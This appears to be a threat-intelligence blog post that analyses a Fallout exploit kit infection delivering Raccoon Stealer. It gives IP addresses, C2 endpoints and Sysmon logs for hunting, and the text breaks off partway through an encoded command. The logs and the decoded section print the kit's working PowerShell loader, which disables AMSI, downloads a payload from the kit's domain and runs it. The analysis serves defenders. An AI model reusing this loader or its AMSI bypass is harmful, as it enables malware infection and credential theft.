Fallout Exploit Kit delivers Raccoon Stealer

NOTE: Some of the base64 powershell is running off the blog page. Using “Reader View” in Browser will show complete poweshell scripts’

The initial redirect was shared in a tweet by @adrian__luca. He is a great source who often shares exploit kit indicators. Another great twitter account for exploit kit indicators is @tkanalyst 

I have added a zipped pcap file for your analysis. The password for the zipped pcap is infected all lowercase.

PCAP file of the infection traffic:
2019-11-18-FalloutEK-pcap.zip

ASSOCIATED DOMAINS:

18.213.92.41 – sp.popcash.net GET /go/213593/460404 – Redirect to Fallout EK
91.213.11.6 – ecoink.ro – Redirect to Fallout EK
136.244.99.131 – kiotoname.com – Fallout EK
216.58.211.46 – drive.google.com – Hosting payload
35.189.105.242 – POST /gate/log.php – Raccoon Stealer C2
35.189.105.242 – POST /file_handler/file.php – Raccoon Stealer C2

 

ASSOCIATED PROCESS BEHAVIOR FOR HUNTING ENDPOINTS:

[Sysmon Event 3] – Internet Explorer communicating with Fallout EK
Image C:\Program Files\Internet Explorer\iexplore.exe
Protocol tcp
SourceIp 192.168.2.24
DestinationIp 136.244.99.131
DestinationHostname 136.244.99.131.vultr.com
DestinationPort 443
DestinationPortName https

[Sysmon Event 1] – Fallout EK exploit – BASE64 CODE IN RED
Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine powershell.exe -w hidden -noni -enc dAByAHkAewAkAEkASQBsAEkASQBJAD0AWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5ADsAJABsAGwAbABJADEAMQBJAGwASQBJAEkAbAA9ACQASQBJAGwASQBJAEkALgBHAGUAdABUAHkAcABlACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAFUAMwBsAHoAZABHAFYAdABMAGsAMQBoAGIAbQBGAG4AWgBXADEAbABiAG4AUQB1AFEAWABWADAAYgAyADEAaABkAEcAbAB2AGIAaQA1AEIAYgBYAE4AcABWAFgAUgBwAGIASABNAD0AJwApACkAKQA7ACQAbAAxADEAMQAxADEASQBJAEkAMQA9ACQAbABsAGwASQAxADEASQBsAEkASQBJAGwALgBHAGUAdABGAGkAZQBsAGQAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAWQBXADEAegBhAFUAbAB1AGEAWABSAEcAWQBXAGwAcwBaAFcAUQA9ACcAKQApACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7ACQAbAAxADEAMQAxADEASQBJAEkAMQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACQAdAByAHUAZQApADsAfQBjAGEAdABjAGgAewB9ADsAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAiAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAApAF0AcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAGwAbAAxADEAbAAxAEkAMQB7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAEkAMQAxAGwAMQBsADEAOwBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAAbABJADEASQBJAEkASQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkAbAAxADEAbAAxADEAbAA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkASQBsAGwAMQBJADEAMQAxADsAfQBbAFMAdAByAHUAYwB0AEwAYQB5AG8AdQB0ACgATABhAHkAbwB1AHQASwBpAG4AZAAuAFMAZQBxAHUAZQBuAHQAaQBhAGwALABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAFUAbgBpAGMAbwBkAGUAKQBdAHAAdQBiAGwAaQBjACAAcwB0AHIAdQBjAHQAIABsAGwAbABJADEAbAAxAEkAMQBsAHsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbABsADEAMQBJAEkAMQAxADsAcAB1AGIAbABpAGMAIABzAHQAcgBpAG4AZwAgAEkAMQAxADEAMQBJAEkAbAA7AHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABsAEkAbABJAGwAbAA7AHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABJAGwAbAAxADEASQBJADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbABsAEkASQBJAEkAbAA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkAMQBJADEAbAAxADEAOwBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABsADEASQBJADEAOwBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABJAGwAbABJADEAMQAxADEAMQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAGwAbAAxADEASQBsADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbABJAEkASQAxAEkAbABJAGwAbAA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkAbABsAGwAbABJAGwAMQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAGwASQBJADEAbABsADsAcAB1AGIAbABpAGMAIABzAGgAbwByAHQAIABsAEkASQBsAGwAbAAxAEkAOwBwAHUAYgBsAGkAYwAgAHMAaABvAHIAdAAgAEkASQBJADEASQBsADsAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAGwAMQAxAEkAbAA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAGwAMQBJADEAMQBsAGwAOwBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAASQAxADEASQAxAGwAbAA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAGwASQAxAGwAbABJAEkAMQAxADsAfQA7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABsAGwASQBsADEAMQBsAGwASQAxAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACIALABTAGUAdABMAGEAcwB0AEUAcgByAG8AcgA9AHQAcgB1AGUAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACgAcwB0AHIAaQBuAGcAIABsADEAMQBsAGwAMQAsAHMAdAByAGkAbgBnACAAbABJAGwAbABsAEkAbAAsAEkAbgB0AFAAdAByACAAbABJAGwAbABJACwASQBuAHQAUAB0AHIAIABJADEASQBJAGwAbAAxACwAYgBvAG8AbAAgAEkAMQBsAEkAMQBsACwAdQBpAG4AdAAgAEkAMQAxADEAMQBJAEkAMQBsAEkAbAAxACwASQBuAHQAUAB0AHIAIABJADEASQAxAEkALABzAHQAcgBpAG4AZwAgAGwAbAAxAGwAMQAxACwAcgBlAGYAIABsAGwAbABJADEAbAAxAEkAMQBsACAAbAAxAEkAMQAxADEAbAAxADEAbABsAEkALABvAHUAdAAgAGwAbAAxADEAbAAxAEkAMQAgAEkASQBJAGwAMQBJAEkASQBJADEASQApADsAfQAiADsAJABsAGwAbAAxADEASQBsAGwAbAA9ACIAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwATABvAHcAXAAkACgALQBqAG8AaQBuACgAKAA0ADgALgAuADUANwApACsAKAA2ADUALgAuADkAMAApACsAKAA5ADcALgAuADEAMgAyACkAfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4AHwAJQB7AFsAYwBoAGEAcgBdACQAXwB9ACkAKQAuAHQAbQBwACIAOwAkAGwAMQBsAGwASQBJAEkAPQAnAGgAdAB0AHAAcwA6AC8ALwBrAGkAbwB0AG8AbgBhAG0AZQAuAGMAbwBtAC8ANAAzADgANAAvAEUAegB4AC8ATABpAHYAZQB0AHIAYQBwAF8AcwBsAGEAeQBhAGIAbABlAF8AdgBlAHIAaQBzAG0AbwBzAC8ASgBlAHcAYgBpAHIAZAAnADsAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAEoARwBOAHMAYQBUADAAbwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBPAFoAWABRAHUAVgAyAFYAaQBRADIAeABwAFoAVwA1ADAASwBUAHMAawBZADIAeABwAEwAawBoAGwAWQBXAFIAbABjAG4ATgBiAEoAMQBWAHoAWgBYAEkAdABRAFcAZABsAGIAbgBRAG4AWABUADAAbgBZAGoAVgAyAE0AagBrADMAUwBYAFEAeQBhAFYARQB6AFoAMwBWAHMATgBDAGMANwBKAEcATgBzAGEAUwA1AEUAYgAzAGQAdQBiAEcAOQBoAFoARQBaAHAAYgBHAFUAbwBKAEcAdwB4AGIARwB4AEoAUwBVAGsAcwBKAEcAeABzAGIARABFAHgAUwBXAHgAcwBiAEMAawA3ACcAKQApAHwAaQBlAHgAOwAkAEkAbABsAGwASQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABsAGwAbABJADEAbAAxAEkAMQBsADsAJABJAGwAbABsAEkALgBsAEkASQBsAGwAbAAxAEkAPQAwAHgAMAA7ACQASQBsAGwAbABJAC4AbABsADEAMQBJAEkAMQAxAD0AWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAUwBpAHoAZQBPAGYAKAAkAEkAbABsAGwASQApADsAJABJAEkAbABsADEASQBsADEASQBJADEASQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABsAGwAMQAxAGwAMQBJADEAOwBbAGwAbABJAGwAMQAxAGwAbABJADEAXQA6ADoAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAoACQAbABsAGwAMQAxAEkAbABsAGwALAAkAGwAbABsADEAMQBJAGwAbABsACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAJABmAGEAbABzAGUALAAwAHgAMAAwADAAMAAwADAAMAA4ACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAIgBjADoAIgAsAFsAcgBlAGYAXQAkAEkAbABsAGwASQAsAFsAcgBlAGYAXQAkAEkASQBsAGwAMQBJAGwAMQBJAEkAMQBTobyAfABvAHUAdAAtAG4AdQBsAGwAOwA=
CurrentDirectory C:\Users\Toby\Desktop\
Hashes MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7
ParentImage C:\Program Files\Internet Explorer\iexplore.exe
ParentCommandLine “C:\Program Files\Internet Explorer\iexplore.exe”

 

[ABOVE BASE64 DECODED]
try{$IIlIII=[Ref].Assembly;$lllI11IlIIIl=$IIlIII.GetType([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String(‘U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5BbXNpVXRpbHM=’)));$l11111III1=$lllI11IlIIIl.GetField([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String(‘YW1zaUluaXRGYWlsZWQ=’)),’NonPublic,Static’);$l11111III1.SetValue($null,$true);}catch{};Add-Type -TypeDefinition “using System;using System.Diagnostics;using System.Runtime.InteropServices;[StructLayout(LayoutKind.Sequential)]public struct ll11l1I1{public IntPtr lI11l1l1;public IntPtr lI1IIII;public uint Il11l11l;public uint IIll1I111;}[StructLayout(LayoutKind.Sequential,CharSet=CharSet.Unicode)]public struct lllI1l1I1l{public uint ll11II11;public string I1111IIl;public string lIlIll;public string Ill11II;public uint llIIIIl;public uint I1I1l11;public uint l1II1;public uint IllI11111;public uint ll11Il;public uint lIII1IlIll;public uint IllllIl1;public uint lII1ll;public short lIIlll1I;public short III1Il;public IntPtr l11Il;public IntPtr ll1I11ll;public IntPtr I11I1ll;public IntPtr llI1llII11;};public static class llIl11llI1{[DllImport(“”kernel32.dll””,SetLastError=true)]public static extern bool CreateProcess(string l11ll1,string lIlllIl,IntPtr lIllI,IntPtr I1IIll1,bool I1lI1l,uint I1111II1lIl1,IntPtr I1I1I,string ll1l11,ref lllI1l1I1l l1I111l11llI,out ll11l1I1 IIIl1IIII1I);}”;$lll11Illl=”$env:userprofile\AppData\LocalLow\$(-join((48..57)+(65..90)+(97..122)|Get-Random -Count 8|%{[char]$_})).tmp”;$l1llIII=‘https://kiotoname.com/4384/Ezx/Livetrap_slayable_verismos/Jewbird’;[Text.Encoding]::ASCII.GetString([Convert]::FromBase64String(‘JGNsaT0oTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KTskY2xpLkhlYWRlcnNbJ1VzZXItQWdlbnQnXT0nYjV2Mjk3SXQyaVEzZ3VsNCc7JGNsaS5Eb3dubG9hZEZpbGUoJGwxbGxJSUksJGxsbDExSWxsbCk7’))|iex;$IlllI=New-Object lllI1l1I1l;$IlllI.lIIlll1I=0x0;$IlllI.ll11II11=[System.Runtime.InteropServices.Marshal]::SizeOf($IlllI);$IIll1Il1II1I=New-Object ll11l1I1;[llIl11llI1]::CreateProcess($lll11Illl,$lll11Illl,[IntPtr]::Zero,[IntPtr]::Zero,$false,0x00000008,[IntPtr]::Zero,”c:”,[ref]$IlllI,[ref]$IIll1Il1II1S|out-null;

[[Sysmon Event 1] – Suspected Applocker bypass using csc.exe
Image C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
CommandLine “C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe” /noconfig /fullpaths @”C:\Users\Toby\AppData\Local\Temp\eyygh-mn.cmdline”
CurrentDirectory C:\Users\Toby\Desktop\
Hashes MD5=3D7D2E825C63FF501E896CF008C70D75,SHA256=037FC52B8FC6089338EB456F2B45638ED36C42A4DCA7ACE391D166B2329838A1
ParentImage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine powershell.exe -w hidden -noni -enc dAByAHkAewAkAEkASQBsAEkASQBJAD0AWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5ADsAJABsAGwAbABJADEAMQBJAGwASQBJAEkAbAA9ACQASQBJAGwASQBJAEkALgBHAGUAdABUAHkAcABlACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAFUAMwBsAHoAZABHAFYAdABMAGsAMQBoAGIAbQBGAG4AWgBXADEAbABiAG4AUQB1AFEAWABWADAAYgAyADEAaABkAEcAbAB2AGIAaQA1AEIAYgBYAE4AcABWAFgAUgBwAGIASABNAD0AJwApACkAKQA7ACQAbAAxADEAMQAxADEASQBJAEkAMQA9ACQAbABsAGwASQAxADEASQBsAEkASQBJAGwALgBHAGUAdABGAGkAZQBsAGQAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAWQBXADEAegBhAFUAbAB1AGEAWABSAEcAWQBXAGwAcwBaAFcAUQA9ACcAKQApACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7ACQAbAAxADEAMQAxADEASQBJAEkAMQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACQAdAByAHUAZQApADsAfQBjAGEAdABjAGgAewB9ADsAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAiAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAApAF0AcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAGwAbAAxADEAbAAxAEkAMQB7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAEkAMQAxAGwAMQBsADEAOwBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAAbABJADEASQBJAEkASQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkAbAAxADEAbAAxADEAbAA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkASQBsAGwAMQBJADEAMQAxADsAfQBbAFMAdAByAHUAYwB0AEwAYQB5AG8AdQB0ACgATABhAHkAbwB1AHQASwBpAG4AZAAuAFMAZQBxAHUAZQBuAHQAaQBhAGwALABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAFUAbgBpAGMAbwBkAGUAKQBdAHAAdQBiAGwAaQBjACAAcwB0AHIAdQBjAHQAIABsAGwAbABJADEAbAAxAEkAMQBsAHsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbABsADEAMQBJAEkAMQAxADsAcAB1AGIAbABpAGMAIABzAHQAcgBpAG4AZwAgAEkAMQAxADEAMQBJAEkAbAA7AHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABsAEkAbABJAGwAbAA7AHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABJAGwAbAAxADEASQBJADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbABsAEkASQBJAEkAbAA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkAMQBJADEAbAAxADEAOwBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABsADEASQBJADEAOwBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABJAGwAbABJADEAMQAxADEAMQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAGwAbAAxADEASQBsADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbABJAEkASQAxAEkAbABJAGwAbAA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkAbABsAGwAbABJAGwAMQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAGwASQBJADEAbABsADsAcAB1AGIAbABpAGMAIABzAGgAbwByAHQAIABsAEkASQBsAGwAbAAxAEkAOwBwAHUAYgBsAGkAYwAgAHMAaABvAHIAdAAgAEkASQBJADEASQBsADsAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAGwAMQAxAEkAbAA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAGwAMQBJADEAMQBsAGwAOwBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAASQAxADEASQAxAGwAbAA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAGwASQAxAGwAbABJAEkAMQAxADsAfQA7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABsAGwASQBsADEAMQBsAGwASQAxAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACIALABTAGUAdABMAGEAcwB0AEUAcgByAG8AcgA9AHQAcgB1AGUAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACgAcwB0AHIAaQBuAGcAIABsADEAMQBsAGwAMQAsAHMAdAByAGkAbgBnACAAbABJAGwAbABsAEkAbAAsAEkAbgB0AFAAdAByACAAbABJAGwAbABJACwASQBuAHQAUAB0AHIAIABJADEASQBJAGwAbAAxACwAYgBvAG8AbAAgAEkAMQBsAEkAMQBsACwAdQBpAG4AdAAgAEkAMQAxADEAMQBJAEkAMQBsAEkAbAAxACwASQBuAHQAUAB0AHIAIABJADEASQAxAEkALABzAHQAcgBpAG4AZwAgAGwAbAAxAGwAMQAxACwAcgBlAGYAIABsAGwAbABJADEAbAAxAEkAMQBsACAAbAAxAEkAMQAxADEAbAAxADEAbABsAEkALABvAHUAdAAgAGwAbAAxADEAbAAxAEkAMQAgAEkASQBJAGwAMQBJAEkASQBJADEASQApADsAfQAiADsAJABsAGwAbAAxADEASQBsAGwAbAA9ACIAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwATABvAHcAXAAkACgALQBqAG8AaQBuACgAKAA0ADgALgAuADUANwApACsAKAA2ADUALgAuADkAMAApACsAKAA5ADcALgAuADEAMgAyACkAfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4AHwAJQB7AFsAYwBoAGEAcgBdACQAXwB9ACkAKQAuAHQAbQBwACIAOwAkAGwAMQBsAGwASQBJAEkAPQAnAGgAdAB0AHAAcwA6AC8ALwBrAGkAbwB0AG8AbgBhAG0AZQAuAGMAbwBtAC8ANAAzADgANAAvAEUAegB4AC8ATABpAHYAZQB0AHIAYQBwAF8AcwBsAGEAeQBhAGIAbABlAF8AdgBlAHIAaQBzAG0AbwBzAC8ASgBlAHcAYgBpAHIAZAAnADsAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAEoARwBOAHMAYQBUADAAbwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBPAFoAWABRAHUAVgAyAFYAaQBRADIAeABwAFoAVwA1ADAASwBUAHMAawBZADIAeABwAEwAawBoAGwAWQBXAFIAbABjAG4ATgBiAEoAMQBWAHoAWgBYAEkAdABRAFcAZABsAGIAbgBRAG4AWABUADAAbgBZAGoAVgAyAE0AagBrADMAUwBYAFEAeQBhAFYARQB6AFoAMwBWAHMATgBDAGMANwBKAEcATgBzAGEAUwA1AEUAYgAzAGQAdQBiAEcAOQBoAFoARQBaAHAAYgBHAFUAbwBKAEcAdwB4AGIARwB4AEoAUwBVAGsAcwBKAEcAeABzAGIARABFAHgAUwBXAHgAcwBiAEMAawA3ACcAKQApAHwAaQBlAHgAOwAkAEkAbABsAGwASQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABsAGwAbABJADEAbAAxAEkAMQBsADsAJABJAGwAbABsAEkALgBsAEkASQBsAGwAbAAxAEkAPQAwAHgAMAA7ACQASQBsAGwAbABJAC4AbABsADEAMQBJAEkAMQAxAD0AWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAUwBpAHoAZQBPAGYAKAAkAEkAbABsAGwASQApADsAJABJAEkAbABsADEASQBsADEASQBJADEASQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABsAGwAMQAxAGwAMQBJADEAOwBbAGwAbABJAGwAMQAxAGwAbABJADEAXQA6ADoAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAoACQAbABsAGwAMQAxAEkAbABsAGwALAAkAGwAbABsADEAMQBJAGwAbABsACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAJABmAGEAbABzAGUALAAwAHgAMAAwADAAMAAwADAAMAA4ACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAIgBjADoAIgAsAFsAcgBlAGYAXQAkAEkAbABsAGwASQAsAFsAcgBlAGYAXQAkAEkASQBsAGwAMQBJAGwAMQBJAEkAMQBTobyAfABvAHUAdAAtAG4AdQBsAGwAOwA=

[Sysmon Event 1]
Image C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
CommandLine C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 “/OUT:C:\Users\Toby\AppData\Local\Temp\RES9732.tmp” “c:\Users\Toby\AppData\Local\Temp\CSC9731.tmp”
CurrentDirectory C:\Users\Toby\Desktop\
User Toby-PC\Toby
Hashes MD5=ED797D8DC2C92401985D162E42FFA450,SHA256=B746362010A101CB5931BC066F0F4D3FC740C02A68C1F37FC3C8E6C87FD7CB1E
ParentImage C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
ParentCommandLine “C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe” /noconfig /fullpaths @”C:\Users\Toby\AppData\Local\Temp\eyygh-mn.cmdline”

[Sysmon Event 1]
Image C:\Users\Toby\AppData\LocalLow\AyJWa1N0.tmp
CommandLine C:\Users\Toby\AppData\LocalLow\AyJWa1N0.tmp
CurrentDirectory C:\Users\Toby\Desktop\
Hashes MD5=D0F59C703FD576CF49EB48AB4CF4743C,SHA256=D8656F5E9B503214E375F94BEC677CF69FB16057EAE7AB66AD7CAAB1B517D7D6
ParentImage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine powershell.exe -w hidden -noni -enc dAByAHkAewAkAEkASQBsAEkASQBJAD0AWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5ADsAJABsAGwAbABJADEAMQBJAGwASQBJAEkAbAA9ACQASQBJAGwASQBJAEkALgBHAGUAdABUAHkAcABlACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAFUAMwBsAHoAZABHAFYAdABMAGsAMQBoAGIAbQBGAG4AWgBXADEAbABiAG4AUQB1AFEAWABWADAAYgAyADEAaABkAEcAbAB2AGIAaQA1AEIAYgBYAE4AcABWAFgAUgBwAGIASABNAD0AJwApACkAKQA7ACQAbAAxADEAMQAxADEASQBJAEkAMQA9ACQAbABsAGwASQAxADEASQBsAEkASQBJAGwALgBHAGUAdABGAGkAZQBsAGQAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAWQBXADEAegBhAFUAbAB1AGEAWABSAEcAWQBXAGwAcwBaAFcAUQA9ACcAKQApACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7ACQAbAAxADEAMQAxADEASQBJAEkAMQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACQAdAByAHUAZQApADsAfQBjAGEAdABjAGgAewB9ADsAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAiAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAApAF0AcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAGwAbAAxADEAbAAxAEkAMQB7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAEkAMQAxAGwAMQBsADEAOwBwAHUAYgBsAGkAYwAgAEkAbg